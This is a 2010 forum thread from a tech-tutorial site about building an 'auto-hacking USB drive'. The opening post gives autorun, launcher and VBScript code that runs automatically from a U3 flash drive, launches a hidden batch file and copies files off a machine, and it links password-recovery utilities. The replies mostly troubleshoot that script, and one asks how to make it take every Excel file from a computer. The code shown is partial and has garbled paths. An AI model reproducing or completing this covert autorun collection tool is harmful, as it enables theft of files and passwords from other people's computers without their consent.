Forum

You must be logged in to post Login Register


Lost Your Password?

Search Forums:


 






Wildcard Usage:
*    matches any number of characters
%    matches exactly one character

How To Make An Auto Hacking USB Drive

Read original blog post

UserPost

10:11 pm
February 10, 2010


admin

Admin

posts 1292

Post edited 3:08 pm – May 13, 2010 by admin


This video will show you how to make an auto-hacking USB drive and how to protect yourself from them.

U3 Universal customizer- http://www.u3community.com/vie…..¦php?t=434

Batch to exe converter – http://download.cnet.com/Bat-T…..55897.html

Nirsoft Utilities – http://www.nirsoft.net

 

AUTORUN SCRIPT:

[Autorun]

open=launch.exe -a

LAUNCH.BAT SCRIPT:

usb.vbs

USB.VBS SCRIPT:

Dim oFSO, oDrive, objFolder, oDestination, shell
Const USBDRIVE=1
oDestination = "c:test"
set oFSO = Wscript.CreateObject("Scripting.FileSystemObject")
Set shell=createobject("wscript.shell")
For Each oDrive in oFSO.Drives

If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter <> "A" Then
shell.run oDrive.DriveLetter & ":batch.bat"
set shell=nothing
End If
Next
Sub CopyFiles(oPath, oDst)
Set objFolder = oFSO.GetFolder(oPath)
For Each Files In objFolder.Files
WScript.Echo "Copying File",Files
newDst=oDst&""&Files.Name
oFSO.CopyFile Files,newDst,True
WScript.Echo Err.Description
Next
End Sub

 


Read original blog post

7:54 pm
February 13, 2010


N2ikola

Guest

Thanks for this tutorial.

I got one question, can it auto download all exel files from computer i would really need that.

Thanks ahead.

8:13 pm
February 22, 2010


goku1712

Guest

Hello tinkernut,

I watched your video how to make an auto usb hacking drive and i wanted the scripts for the files.

So where can i find them because i tried to type them from the video but it shows error.Please Help Me!!!!

11:18 pm
February 22, 2010


hellblazer55

Guest

The links on the current video are false due to the hacker so i would run a virus/spyware/malware scan just incase but ill get the links

U3 Universal customizer- http://www.u3community.com/vie……php?t=434

Batch to exe converter – http://download.cnet.com/Bat-T…..55897.html

Nirsoft Utilities – http://www.nirsoft.net

That should set you up proper now

Enjoy!

9:37 am
February 23, 2010


admin

Admin

posts 1292

thnx hellblazer

2:04 pm
February 23, 2010


Un4goten_Syn

Guest

Any chance the scripts are near?

12:27 am
February 24, 2010


goku1712

Guest

Thanks

for the links but i cant find the scripts for "usb.vbs" file.

Can anyone tell me please.

8:11 pm
February 27, 2010


mz

Guest

any body has the code for the auto hacking usb

8:47 pm
February 27, 2010


guy123

Guest

Frownwhere are the codes for the auto hacking usb drive

 

the u3 customizer says my flash drive is not u3 but it is

3:57 am
February 28, 2010


goku1712

Guest

can someone help me 

i need scripts of the vbs.file…………………….

pleasse i need those

1:11 pm
February 28, 2010


Alessandro Milano Ro

Guest

goku1712 said:

can someone help me 

i need scripts of the vbs.file…………………….

pleasse i need those


Have a go at sending a private message to the admin, this thread is starting to fill up with unnecessary posts.

5:45 pm
March 17, 2010


Antonio Montana

Guest

I watched everything what you did,and when I putted the USB into the PC, Command Prompt Pop Up, and inside it it says: F:\>\usb.vbs and Windows Script Host also Pops Up saying:
Script: F:\USB.VBS
Line: 3
Char:16
Error: Invalid character
Code: 800A0408
Source: Microsoft VBScript compilation error 

How can I make this work.

Thanks.

2:44 pm
March 22, 2010


admin

Admin

posts 1292

Obviously you have an infavlid character on line 3. Make sure that you don't have any extra spaces or characters that aren't accepted in vb scripting. If you have no idea what I just said, then you probably shouldn't be doing this project.

11:22 pm
March 26, 2010


daultimate1

New Member

posts 1

Post edited 12:50 am – March 27, 2010 by


admin said:

Obviously you have an infavlid character on line 3. Make sure that you don't have any extra spaces or characters that aren't accepted in vb scripting. If you have no idea what I just said, then you probably shouldn't be doing this project.


 

Seriously….. This is supposed to be a help thread. Have some love and help him out.

 

@ Antonio Montana - 

I had the same problem and it took me some time to figure it out. Its the stupid quotation marks that are not being recognized

because of the font from this forum. Just go through the script erasing every " character and retyping it. That should do the trick. Laugh

 

Now for a more serious error:

"Windows – No Disk"

"Exception Processing Message c0000013 Parameters 75b6bf7c 4 75b6bf7c 75b6bf7c"

When I click Try Again, it does the same thing.

When I click Continue, it gives me:

Script:     G:USB.VBS

Line:       10

Char:      1

Error:      The system cannot find the file specified.

Cade:      80070002

Source:   (null)

 

Here is Line 10 from USB.VBS:

shell.run oDrive.DriveLetter & ":batch.bat"

 

Here is Line 10 from your script:

shell.run oDrive.DriveLetter & “:batch.batâ€

 

Any help would be great. Cool

Thanks,

DaUltimate1

 

UPDATE:

Ok after some "tinkering" I figured out why it was not seeing batch.bat

Thats because I have a HP printer with SD card reader conected and the computer recognizes that SD card reader inside the printer as a removable drive.

So when the U3 is activated, the script tells it to go down the list and find the "Removable Drive/USB." In my case the first one is the SD card reader and it gives me the error.

To avoid this in the future there needs to be an if else type of statement in the script to search for other USB devices and look for the batch.bat file there before executing it.

 

DaUltimate1

1:44 pm
April 26, 2010


zaz982

Bulgaria/America

Admin

posts 338

Admin can you provide the source code for the entire project. I'm having trouble copying the text from the video.

10:00 am
May 3, 2010


war3editor

New Member

posts 1

where is the scrip the video sade it whold be here but i can´t find it

 

 

PLZ HELPLaugh

1:31 am
June 17, 2010


Quick

Lithuania , Siauliai

New Member

posts 1

I have found a website that shows how write custom ISO to U3's CDFS partition in all windows versions (7 , vista …) http://www.hadak.org/2010/02/2…..windows-7/ also there is a program called u3-autorun (http://sourceforge.net/project…..3-autorun/) that works if more than one flash drive is plugged in

8:40 pm
June 17, 2010


hunter737

Moderator

posts 78

daultimate1 said:

admin said:

Obviously you have an infavlid character on line 3. Make sure that you don't have any extra spaces or characters that aren't accepted in vb scripting. If you have no idea what I just said, then you probably shouldn't be doing this project.


 

Seriously….. This is supposed to be a help thread. Have some love and help him out.

 


 

I understand asking for help, but admin did help, and like he said, if you don't even know what vb scripting means or what an invalid character is, then you really should not be leaping straight into auto-hacking USB projects.  Start with something a little more basic.  Please note that I am not telling you to do something more basic, you seem to know what you're doing.  But there are a lot of people on this site and others that try really high-level projects, higher than this one, with no coding background, and that's just not a good idea.

 

Anyway, cheers Cool

Sign by

Danasoft – For Backgrounds and Layouts

Light travels faster than sound, that's why some people appear bright until you hear them speak.


About the Tinkernut.com forum

Most Users Ever Online: 56

Currently Online:
21 Guests

Currently Browsing this Topic:
5 Guests

Forum Stats:

Groups: 5
Forums: 20
Topics: 1583
Posts: 6527

Membership:

There are 1419 Members
There have been 442 Guests

There are 19 Admins
There are 4 Moderators

Top Posters:

Johnchen0213 – 87
capricornJZ – 8
jwierer – 8
henrybarnett – 7
thethebuilder – 7
ultatoday – 6

Recent New Members: Fidde, TechWizzyBoy, sinan2010, markettips1, mrfijiwiji, Array

Administrators: admin (1292 Posts), mikethedj4 (785 Posts), koletyler15 (380 Posts), -Jeff- (362 Posts), zaz982 (338 Posts), GoYankees (233 Posts), unrealgeek (222 Posts), TheOnlinePC (215 Posts), pyroman (200 Posts), Castle_Rock (178 Posts), Don Atlantic (117 Posts), ashrith (112 Posts), Ben (105 Posts), zainuintel (103 Posts), Gyan Guru (91 Posts), THE BOSS (83 Posts), Iamcomputer (79 Posts), windowsxp08 (73 Posts), Gregg-Tech (2 Posts)

Moderators: Skwerool (81 Posts), hunter737 (78 Posts), jondillinger (22 Posts), duncsweb (18 Posts)



Bookmark and Share